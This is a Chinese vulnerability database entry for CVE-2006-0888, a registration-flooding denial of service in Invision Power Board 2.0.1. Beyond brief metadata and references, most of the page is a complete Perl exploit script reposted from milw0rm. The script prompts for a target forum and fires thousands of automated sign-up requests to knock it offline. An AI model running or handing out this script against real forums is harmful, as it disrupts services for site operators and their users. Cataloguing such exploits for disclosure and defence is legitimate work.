Invision Power Board用户注册拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109724 漏洞类型 其他
发布时间 2006-02-10 更新时间 2006-02-27
CVE编号 CVE-2006-0888 CNNVD-ID CNNVD-200602-399
漏洞平台 Multiple CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/1489
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-399
|漏洞详情
InvisionPowerBoard(IPB)2.0.1中的index.php在禁用代码确认的情况下,可使远程攻击者通过注册大量用户造成未明拒绝服务。
|漏洞EXP
#!/usr/bin/perl
use IO::Socket;
##########################################################
##		 _______ _______ ______ 		 #
##		 |______ |______ |     \		 #
##		 ______| |______ |_____/		 #
##		                        		 #
##IPB Register Multiple Users Denial of Service	   	 #
##Doesn't Work on forums using "Code Confirmation"	 #
##Created By SkOd                                        #
##SED security Team                                      #
##http://www.sed-team.be                                 #
##skod.uk@gmail.com                                      #
##ISRAEL                                                 #
##########################################################

print q{
############################################################
#        Invision Power Board Multiple Users DOS	   #
#		Tested on IPB 2.0.1			   #
#	    created By SkOd. SED Security Team             #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]
|参考资料

来源:BID
名称:16616
链接:http://www.securityfocus.com/bid/16616
来源:MILW0RM
名称:1489
链接:http://milw0rm.com/exploits/1489